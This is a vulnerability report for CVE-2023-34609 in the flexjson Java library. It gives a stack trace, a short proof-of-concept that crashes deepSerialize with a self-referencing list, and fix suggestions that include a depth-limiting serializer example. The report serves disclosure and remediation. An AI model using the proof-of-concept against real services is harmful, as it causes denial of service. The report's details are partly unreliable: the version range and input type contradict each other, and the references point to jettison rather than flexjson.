CVE-2023-34609: Flexjson / Bugs / #51 Stack overflow error caused by flexjson serialization List

An issue was discovered in flexjson through 3.3 that allows attackers to cause a denial of service or other unspecified impacts via a crafted object that uses cyclic dependencies.

Stack overflow error caused by flexjson serialization List

Description

flexjson before v3.3 was discovered to contain a stack overflow via the List parameter. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted string.

Error Log

    Exception in thread "main" java.lang.StackOverflowError
        at java.base/java.util.Stack.push(Stack.java:67)
        at flexjson.JSONContext.pushTypeContext(JSONContext.java:140)
        at flexjson.JSONContext.writeOpenArray(JSONContext.java:268)
        at flexjson.transformer.IterableTransformer.transform(IterableTransformer.java:24)
        at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
        at flexjson.JSONContext.transform(JSONContext.java:72)
        at flexjson.transformer.IterableTransformer.transform(IterableTransformer.java:28)
        at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
        at flexjson.JSONContext.transform(JSONContext.java:72)
        at flexjson.transformer.IterableTransformer.transform(IterableTransformer.java:28)
        at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
        at flexjson.JSONContext.transform(JSONContext.java:72)
        at flexjson.transformer.IterableTransformer.transform(IterableTransformer.java:28)
        at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
        at flexjson.JSONContext.transform(JSONContext.java:72)
        at flexjson.transformer.IterableTransformer.transform(IterableTransformer.java:28)
        at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
        at flexjson.JSONContext.transform(JSONContext.java:72)
        at flexjson.transformer.IterableTransformer.transform(IterableTransformer.java:28)
        at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
        at flexjson.JSONContext.transform(JSONContext.java:72)

PoC

    <dependency>
        <groupId>net.sf.flexjson</groupId>
        <artifactId>flexjson</artifactId>
        <version>3.3</version>
    </dependency>

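    import flexjson.JSONSerializer;

    import java.util.ArrayList;

    public class PoC3 {
        public static void main(String[] args) {
            // A list that contains itself: the cyclic reference from the report.
            ArrayList<Object> list = new ArrayList<>();
            list.add(list);

            // deepSerialize follows the self-reference without bound, ending in StackOverflowError.
            String s = new JSONSerializer().deepSerialize(list);
        }
    }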

Rectification Solution

  1. Follow the jackson-databind fix: add a depth variable that records the current parsing depth, and throw an exception if the depth exceeds a certain threshold. (https://github.com/FasterXML/jackson-databind/commit/fcfc4998ec23f0b1f7f8a9521c2b317b6c25892b)

  2. Follow the Gson fix: replace the recursive processing of deeply nested arrays or JSON objects with stack-plus-iteration processing. (https://github.com/google/gson/commit/2d01d6a20f39881c692977564c1ea591d9f39027)
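The depth-counter approach from item 1, as an added example that is not code from flexjson, jackson-databind or Gson. It goes one step beyond the text by also rejecting a container that is already on the current path, and the names DepthLimitedWriter and MAX_DEPTH and the threshold value are assumptions made for illustration:

```java
import java.util.ArrayList;
import java.util.Collections;
import java.util.IdentityHashMap;
import java.util.Set;

// Added illustration; DepthLimitedWriter and MAX_DEPTH are hypothetical names, not flexjson API.
public class DepthLimitedWriter {
    static final int MAX_DEPTH = 1000; // assumed threshold, sized to the thread stack

    public static String write(Object value) {
        StringBuilder out = new StringBuilder();
        // Containers on the current path, compared by identity (a cyclic list's hashCode() also recurses).
        Set<Object> path = Collections.newSetFromMap(new IdentityHashMap<>());
        write(value, out, 0, path);
        return out.toString();
    }

    private static void write(Object value, StringBuilder out, int depth, Set<Object> path) {
        if (depth > MAX_DEPTH) throw new IllegalStateException("nesting depth exceeds " + MAX_DEPTH);
        if (value instanceof Iterable) {
            if (!path.add(value))
                throw new IllegalStateException("cyclic reference at depth " + depth);
            out.append('[');
            String separator = "";
            for (Object item : (Iterable<?>) value) {
                out.append(separator);
                separator = ",";
                write(item, out, depth + 1, path);
            }
            out.append(']');
            path.remove(value); // the same object may still appear again as a sibling
        } else if (value == null || value instanceof Number || value instanceof Boolean) {
            out.append(value);
        } else { // strings: only quote and backslash are escaped in this sketch
            String s = value.toString().replace("\\", "\\\\").replace("\"", "\\\"");
            out.append('"').append(s).append('"');
        }
    }

    public static void main(String[] args) {
        ArrayList<Object> list = new ArrayList<>();
        list.add(list); // same cyclic shape as the PoC input
        try {
            write(list);
        } catch (IllegalStateException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The identity check stops the self-referencing list at the first repeat, while the depth counter bounds input that is deeply nested without being cyclic.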

References

  1. https://github.com/jettison-json/jettison/issues/52
  2. https://github.com/jettison-json/jettison/pull/53/files
